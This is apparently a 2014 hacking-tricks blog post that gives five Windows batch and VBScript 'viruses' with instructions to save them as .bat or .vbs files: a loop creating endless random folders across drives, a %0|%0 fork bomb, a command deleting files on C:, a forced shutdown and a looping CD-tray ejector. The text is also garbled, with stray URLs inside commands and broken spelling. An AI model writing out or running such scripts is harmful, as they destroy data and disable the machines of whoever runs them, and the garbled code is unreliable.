Saturday 13 December 2014

Creat a Dengor's Virus for computer

Virus No 1_______

@echo off
:VIRUS
cd /d C:
md %RANDOM% http://allhackingtricks2015.wordpress.com/
cd /d D: Virus sid Link
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in

And save it at .bat file

____________________________________________________________________

Virus No 2________________

%0|%0

ANd Save it at .bat file
_____________________________________________________________________

Virus No 3

@Echo off
Del C:\ *.* |y

Save as .bat file
______________________________________________________________________
Virus No 4 Simple Shud Down

    @echo off
    echo Message here.
    shutdown -s -f -t 60 -c "type a message you want to appear here."

.bat file
_______________________________________________________________________
virus no 5...
it closed to (alt+ctl+del+)

copy the following code in it-
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save as.vbs file
____________________________________________________
http://allhackingtricks2015.blogsport.com/ link side make a virus..
____________________________________________________

0 comments: